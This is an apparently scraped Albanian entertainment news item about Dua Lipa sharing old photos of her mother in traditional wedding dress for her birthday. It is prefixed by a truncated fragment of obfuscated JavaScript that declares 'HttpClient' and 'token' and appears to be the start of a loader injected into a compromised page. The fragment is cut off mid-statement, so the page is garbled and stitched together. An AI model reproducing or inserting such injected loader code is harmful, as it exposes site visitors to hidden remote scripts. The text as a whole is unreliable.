;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Të gjithë i kemi në arkiva! Dua Lipa publikon fotografitë e vjetra të së ëmës në “dymija e jelek”

By

Të  gjithë pothuajse i ruajmë me xhelozi fotografitë e prindërve tanë në rininë e tyre, qoftë nga dasma apo ato fotografitë e famshme te fotografi ku të gjithë rrinin gatitu!

Dhe të tilla në sirtarë patjetër ka edhe Dua Lipa.

Këngëtarja e famshme ka publikuar imazhet e së ëmës kur ajo ishte nuse me rastin e ditëlindjes së saj. Anesa Lipa ishte veshur me kostumin tradicional, dymija e jelek ndërsa një imazh si ky është shumë i zakonshëm për familjet shqiptare.

“Urime ditëlindjen për mbretëreshën e botës time. Numrin një përgjithmonë. Të dua më shumë se sa fjalët mund ta përshkruajnë”, ka shkruar Dua në urimin e saj, duke i bashkëngjitur kësaj deklarate dashurie edhe një seri imazhesh të së ëmës. /Prive.al

Artikuj të ngjashëm